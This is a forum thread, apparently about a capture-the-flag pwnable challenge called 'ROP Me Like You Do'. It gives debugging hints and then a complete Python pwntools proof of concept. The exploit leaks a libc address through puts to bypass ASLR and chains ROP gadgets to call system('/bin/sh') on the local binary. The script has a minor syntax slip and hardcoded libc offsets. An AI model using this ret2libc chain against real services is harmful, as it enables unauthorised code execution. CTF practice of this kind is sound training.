[Pwnable] ROP Me Like You Do

challenge
rop
linux
pwning

#21

You are overwriting only the return address. ROP gadgets are missing. Are you sure you’re leaking a legit libc address?

Where do you return after the leak? Doesn’t look like you’re returning to the right place.

Why did you hardcore the address of bin/sh? ASLR should be on.

Below is @exploit’s PoC in case you want to have a look:

#!/usr/bin/python
from pwn import *

c = process("./ropme")
pause()

puts_off = 0x6f690
sys_off = 0x45390
sh_off = 0x18cd17


# ENTRIES
puts_got = 0x601018
main     = 0x4005a6
pop_rdi  = 0x400643
puts_plt = 0x400476

# ROP - PART 1
payload = "A" * 72
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)

# SENDING
c.recvuntil("ROP me outside, how 'about dah?")
c.sendline(payload)

# LEAK
c.recvline()
puts = u64(c.recv(6).ljust(8, "\x00"))

# CALCULATING
libc_base = puts - puts_off
libc_system = libc_base + sys_off
libc_sh = libc_base + sh_off

# PRINTING
log.success("Libc: " + hex(libc_base))
log.success("system: " + hex(libc_system))
log.success("/bin/sh: " + hex(libc_sh)

# ROP - PART 2
payload = "A" * 72
payload += p64(pop_rdi)
payload += p64(libc_sh)
payload += p64(libc_system)

# SENDING
c.sendline(payload)

# YOU ROP? I DO TOO
log.success("PWNED!")

c.interactive()

#22

Thank you, I’m really far from the solution :confused:
I have the right system address…
I’ll try to understand his POC thanks :slight_smile:


(Command-Line Ninja) #23

Wow that exploit code is beautiful :heart_eyes:


#24

That’s because exploit dev is an art :ok_hand:


#25